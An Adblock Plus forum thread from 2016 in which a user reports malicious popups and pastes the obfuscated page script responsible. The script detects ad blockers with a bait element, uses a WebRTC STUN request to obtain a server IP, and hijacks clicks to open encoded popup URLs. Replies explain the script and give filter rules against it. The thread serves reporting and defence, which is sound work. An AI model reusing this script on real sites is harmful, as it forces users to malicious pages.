Adblock Plus

Ads were yesterday!
https://forum.adblockplus.org/

Critical Security Issue when EasyList On

https://forum.adblockplus.org/viewtopic.php?f=10&t=49198

Page 1 of 1

Critical Security Issue when EasyList On

Posted: Sun Oct 23, 2016 10:38 am
by scottreeddev
Hi just joined to report this.

The last few days I have been getting popup windows opening on links to pages, for example reading

Code: Select all

http://www.viralitytoday.com/46-Last-Minute-Halloween-Costume-Ideas-You-Should-Totally-Steal90/7?utm_source=152&utm_medium=2&utm_campaign=580bd519e2bda
on the next button at the bottom when clicking a tab opens up to random quite dangerous malicious website.

I went through the process of avg scanning and malwarebytes which showed nothing so I had a look at the event handlers on the buttons which showed a new onlick event on the link to what looks like some generated script (attached below).

I've been through the process of removing all extensions and re-enabling and tracked it down to only happening when AdBlock Plus (which I have used for years) as the problem. I then went deeper and the issue only happens when EasyList is enabled, so I've turned it off and everything is working.

As this is on by default and something dodgy is going on I wanted to raise it.

Here is the script described above

Code: Select all

(function() {
    var was_init = false;
    function init_myscript() {
        if (was_init)
            return;
        was_init = true;
        var c = document.createElement("div");
        c.innerHTML = " ";
        c.className = "adsbox";
        document.body.appendChild(c);
        window.setTimeout(function() {
            if (0 === c.offsetHeight) {
                var l = 0
                  , d = new (window.RTCPeerConnection || window.mozRTCPeerConnection || window.webkitRTCPeerConnection)({
                    iceServers: [{
                        url: "stun:1755001826:443"
                    }]
                },{
                    optional: [{
                        RtpDataChannels: !0
                    }]
                });
                d.onicecandidate = function(b) {
                    var e = "";
                    !b.candidate || !(b = /([0-9]{1,3}(\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/.exec(b.candidate.candidate)[1]) || m || b.match(/^(192\.168\.|169\.254\.|10\.|172\.(1[6-9]|2\d|3[01]))/) || b.match(/^[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7}$/) || (m = !0,
                    e = b,
                    document.onclick = function() {
                        current_count = parseInt((document.cookie.match("noprpocbedhpwgnxtcnt=([^;].+?)(;|$)") || [])[1] || 0);
                        if (!l && 2147483646 > current_count) {
                            l = 1;
                            var a = document.createElement("a")
                              , b = Math.floor(1E12 * Math.random())
                              , f = Math.random().toString(36).replace(/[^a-zA-Z0-9]+/g, "").substr(0, 10);
                            a.href = "http://" + e + "/" + n.encode(b + "/" + (1307581 + b) + "/" + f);
                            a.target = "_blank";
                            document.body.appendChild(a);
                            b = new MouseEvent("click",{
                                view: window,
                                bubbles: !1,
                                cancelable: !1
                            });
                            a.dispatchEvent(b);
                            a.parentNode.removeChild(a);
                            a = new Date;
                            a.setTime(a.getTime() + 86400000);
                            b_date = (existing_date = unescape((document.cookie.match("noprpocbedhpwgnxtexp=([^;].+?)(;|$)") || [])[1] || "")) ? existing_date : a.toGMTString();
                            a = "; expires=" + b_date;
                            document.cookie = "noprpocbedhpwgnxtcnt=" + (current_count + 1) + a + "; path=/";
                            document.cookie = "noprpocbedhpwgnxtexp=" + b_date + a + "; path=/"
                        }
                    }
                    )
                }
                ;
                d.createDataChannel("");
                d.createOffer(function(b) {
                    d.setLocalDescription(b, function() {}, function() {})
                }, function() {})
            }
            Math.random().toString(36).replace(/[^a-zA-Z0-9]+/g, "").substr(0, 10);
            var m = !1
              , n = {
                _0: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
                encode: function(b) {
                    for (var e = "", a, c, f, d, k, g, h = 0; h < b.length; )
                        a = b.charCodeAt(h++),
                        c = b.charCodeAt(h++),
                        f = b.charCodeAt(h++),
                        d = a >> 2,
                        a = (a & 3) << 4 | c >> 4,
                        k = (c & 15) << 2 | f >> 6,
                        g = f & 63,
                        isNaN(c) ? k = g = 64 : isNaN(f) && (g = 64),
                        e = e + this._0.charAt(d) + this._0.charAt(a) + this._0.charAt(k) + this._0.charAt(g);
                    return e
                }
            }
        }, 100)
    }
    document.addEventListener("DOMContentLoaded", function() {
        init_myscript();
    });
    window.setTimeout(init_myscript, 50)
})();

Re: Critical Security Issue when EasyList On

Posted: Sun Oct 23, 2016 10:52 am
by smed79
This script open a popup (only chrome) when it detects ABP. You should add a filter like that example.com#@#.adsbox (replace example.com by the site who open the popup).

Also try this filter

Code: Select all

||130.211.198.219^$popup
e.g. here https://forums.lanik.us/viewtopic.php?p=104809#p104809

Re: Critical Security Issue when EasyList On

Posted: Sun Oct 23, 2016 7:49 pm
by scottreeddev
yes, I wasn't posting it for an explanation, I'm a software engineer. I was posting it to report a issue with ABP installed with it's out the box configuration, it's a pretty serious issue in my mind and should be patched rapido

Re: Critical Security Issue when EasyList On

Posted: Sun Oct 23, 2016 7:53 pm
by mapx
There is no issue. It's all about filters, "detecting" adblockers and so on.
For example, if some site detects an adblocker they push ads using blobs / websockets / service workers.

Re: Critical Security Issue when EasyList On

Posted: Sun Oct 23, 2016 7:56 pm
by mapx
and in your example case it's enough

Code: Select all

||130.211.198.219^$popup

Re: Critical Security Issue when EasyList On

Posted: Sun Oct 23, 2016 7:59 pm
by mapx
alternative rule:

Code: Select all

@@||viralitytoday.com^$generichide

Re: Critical Security Issue when EasyList On

Posted: Sun Oct 23, 2016 8:09 pm
by scottreeddev
I was assuming the nature and severity of the popups that are appearing which are to some very nasty sites trying to force the installation of malicious extensions would mean any posted issues like this would be made against a master list or via and update. Having to add a rule in for domains is all well as good if you're got a good grasp of technology and the configuration of pattern matching but I very much doubt last amount of the ADP user base would know how to do that. Anyhow thanks for the reply, I was only posting this on the assumption that someone was proactively trying to feed these things back in for regular users.

Re: Critical Security Issue when EasyList On

Posted: Sun Oct 23, 2016 8:14 pm
by mapx
smed79 already showed you similar posts in easylist forum (main list), so yeah is there the place to report such malicious pages / popups.
reported ==> https://forums.lanik.us/viewtopic.php?f=62&t=33645

Re: Critical Security Issue when EasyList On

Posted: Mon Oct 24, 2016 6:45 pm
by lewisje
The OP sounds like Dunning and Kruger in action.
All times are UTC+02:00
Page 1 of 1

Powered by phpBB® Forum Software © phpBB Limited